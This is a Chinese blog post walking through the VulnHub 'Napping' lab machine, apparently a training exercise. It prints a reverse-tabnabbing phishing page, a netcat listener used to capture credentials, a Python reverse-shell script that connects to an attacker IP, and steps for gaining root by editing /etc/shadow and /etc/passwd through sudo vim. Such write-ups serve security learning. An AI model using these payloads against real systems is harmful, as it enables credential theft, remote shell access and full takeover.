vulnhub靶场6:napping

最新推荐文章于 2024-07-10 08:51:49 发布
最新推荐文章于 2024-07-10 08:51:49 发布
阅读量186 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Genarior/article/details/130710725
版权

1、nmap -sn 192.168.8.0/24

2、nmap -p- -A 192.168.8.168

开放80端口

3、首页,注册登录

4、<a>标签target="_blank",存在Reverse Tabnabbing,标签钓鱼攻击。

 5、构建钓鱼页面

<html>
    page b
    <script>
        if(window.opener){
            window.opener.location = "http://192.168.8.166:8000/c.html";
        }
        else{
            alert("no vul");

        }
    </script>
</html>

6、启动python3 -m http.server 80 监听,同步nc -lvvp 8000端口监听,获得了账号密码

7、ssh登录,查看权限

8、find / -group administrators -type f 2>/dev/null 查看有相同权限的文件 ,发现了一个query.py

9、修改query.py为反弹shell脚本

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.8.166",4444))
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"]);

10、获得反弹shell,查看sudo可执行命令,可以无需密码root权限执行vim

11、先升级成交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM = xterm-265color

ctrl+Z

stty raw -echo;fg

reset

stty rows 27 columns 77

12、使用openssl添加密钥

openssl passwd -6 -salt aaa 123456

13、使用sudo vim修改/etc/shadow文件
 

shadow 密码保存文件,文件每一行代表一个用户,每一行通过冒号:分为九个部分

    1. 用户名2. 加密后的密码3. 上次修改密码的时间(从1970.1.1开始的总天数)4. 两次修改密码间隔的最少天数,如果为0,则没有限制5. 两次修改密码间隔最多的天数,表示该用户的密码会在多少天后过期,如果为99999则没有限制6. 提前多少天警告用户密码将过期7. 在密码过期之后多少天禁用此用户8. 用户过期日期(从1970.1.1开始的总天数),如果为0,则该用户永久可用9. 保留

 supertest:$6$aaa$rzNpVK12/RIxUFx.HixBbeRuIJYfw78hhQ8ocZfh5S2dIwa1r7dGW52qww4wcngdOzj3A5r9ni9a8C.mruV2M0:19261:0:99999:7:::

使用sudo vim 修改/etc/passwd文件添加用户

/etc/passwd 
    passwd 文件的格式,每一行代表一个用户,每一行通过冒号:分为七个部分
    1. 用户名2. 密码,x表示密码保存在/etc/shadow3. UID,0代表root4. GID,表示所在组5. 描述信息,依次为Full Name、Room Number、Work Phone、Home Phone和Other6. 用户主目录7. 默认shell类型

添加完成 su supertest切换成root账号。

-------------------------------------------------------------------------

1、Reverse Tabnabbing,标签钓鱼攻击

2、openssl passwd -6 -salt aaa 123456 创建密码,及/etc/shadow文件格式

3、/etc/passwd文件格式

Genarior
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NAPPING
10-24
标题"NAPPING"可能指的是一个与字体设计或者艺术相关的项目,因为"字体"是给定的标签之一。在IT行业中,字体通常涉及到用户界面(UI)设计、网页设计、图形设计等领域,是信息传达的重要组成部分。字体的选择和设计...
napping-player:适用于 Android 平板电脑的视频播放器,可进行“小睡”实验
06-29
打盹儿 这是一款适用于 Android 平板电脑的视频播放器,可以进行“小睡”实验。 什么是午睡实验? 来自 Nestrud、Michael A. 和 Harry T.... “从 MFA 和 MDS 的小睡数据中恢复子采样维度和配置。...
Vulnhub_Napping
qq_45434762的博客
02-13 3320
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
VulnHub-Napping打靶记录
qq_43534481的博客
08-24 315
Vulnhub Napping靶场 详细通关记录。
Vulnhub靶场NAPPING: 1.0.1
DG_s1mple
04-01 6063
环境准备 下载靶机导入到vmware 攻击机IP地址为:192.168.2.18 靶机IP地址为:192.168.2.16 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务 我们首先访问一下他的http服务 是一个登录界面,并且可以注册账号,我们先注册一下 有一个文本框,我们测试一下功能 发现我们输入什么网站,他就跳转到什么网站,这么会存在Tabnabbing攻击 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面
4-vulnhub靶场napping
qq_49078152的博客
08-21 390
vulnhub靶场napping,vim提权,2>/dev/null过滤
vulnhub——napping-1.0.1靶机
Re1_zf的博客
11-01 1202
首先,创建一个反弹shell的sh文件,这里需要注意路径需要在当前用户目录下,否则没有权限创建文件。大概内容就是只要本地web服务可以正常访问,就每隔两分钟向日志文件中写入当前时间。修改一下py执行文件的内容,使其执行编辑好的反弹shell的脚本。这样的话,借助这个py文件,我们可以尝试向攻击机反弹shell。等待一会儿后会有一个shell反弹过来,同时查看一下权限。这里需要注意一下,返回的数据包需要进行一下URL解码。看一下这个目录下的执行日志,大概就是两分钟执行一次。查找一下这个组有权限运行的程序。
小睡:Golang HTTP客户端库
02-20
Napping的灵感来自Python出色的库。状态系统状态特拉维斯CI CircleCI 工作服 Codecov 由使用并与它联合开发。安装要求Napping已。发展go get github.com/jmcvetta/napping稳定的小睡使用版本化。 当前版本是v3 。 ...
deep-perfumes-potion-app:使用自然语言处理对香水推荐引擎进行用户评论方面的培训
05-04
深香水药水应用使用自然语言处理对香水推荐引擎进行用户评论方面的培训在上尝试该应用从basenotes.com(于04/2018撤消)收集了近6,000种香水,对140,000多条用户评论进行了培训。 使用gensim doc2vec在不同的香水和...
关于Mybatis使用原生接口开发的心得以及示例代码.docx
06-28
刚刚做完mybatis原生接口的开发模式,怎么说呐,整个人心态崩掉,这东西可以说是麻烦透顶了......基本全都是配置,而且和JDBC比起来甚至让我感觉没啥优化了的地方(难道优化的就是那寥寥几个...M: Napping-O与R之间的映射
智能手机英语怎么说.docx
02-27
6. The result is an application on that person's smartphone. 智能手机英语怎么说全文共3页,当前为第2页。 智能手机英语怎么说全文共3页,当前为第2页。 拖放组合的结果就是你智能手机上的应用程序. 7. ...
Vulnhub 靶机 Napping 1.0.1 write up Reverse Tabnabbing钓鱼 修改root权限的定时py文件 + vim 提权
YouthBelief的博客
01-12 1627
0x00 环境准备 下载地址 https://www.vulnhub.com/entry/napping-101,752/ 靶机介绍 Name: Napping: 1.0.1 Date release: 22 Oct 2021 Author: hadrian3689 Series: Napping Description Even Admins can fall asleep on the job 虚拟机 Virtualbox 仅主机 kali也用该网
VulnHub渗透测试实战靶场-HA:NARAK
LYJ20010728的博客
08-20 819
VulnHub渗透测试实战靶场-HA:NARAK环境下载HA:NARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HA:NARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.140 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 667
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
移动互联安全扩展要求测评项
最新发布
hakksjss的博客
07-10 805
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 941
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
[图解]SysML和EA建模住宅安全系统-11-接口块
rolt的专栏
07-06 996
当然内部块图里面肯定要比这个丰富
【知网CNKI-注册安全分析报告】
07-08 1410
知网作为全国学术界、教育界、出版界、图书情报界的共享平台,打造是国家基础设施,由于收费过高导致很多单位苦知网已经,名符其实的垄断行业,赚的盆满钵满的, 按理技术实力雄厚,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。
如何删除导入napping
05-26
如果您想删除已导入的Python模块`napping`,可以使用以下命令: ``` pip uninstall napping ``` 这将从Python环境中删除`napping`模块及其依赖项。请注意,您需要在命令行中执行此命令,并确保您具有足够的权限来卸载模块。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值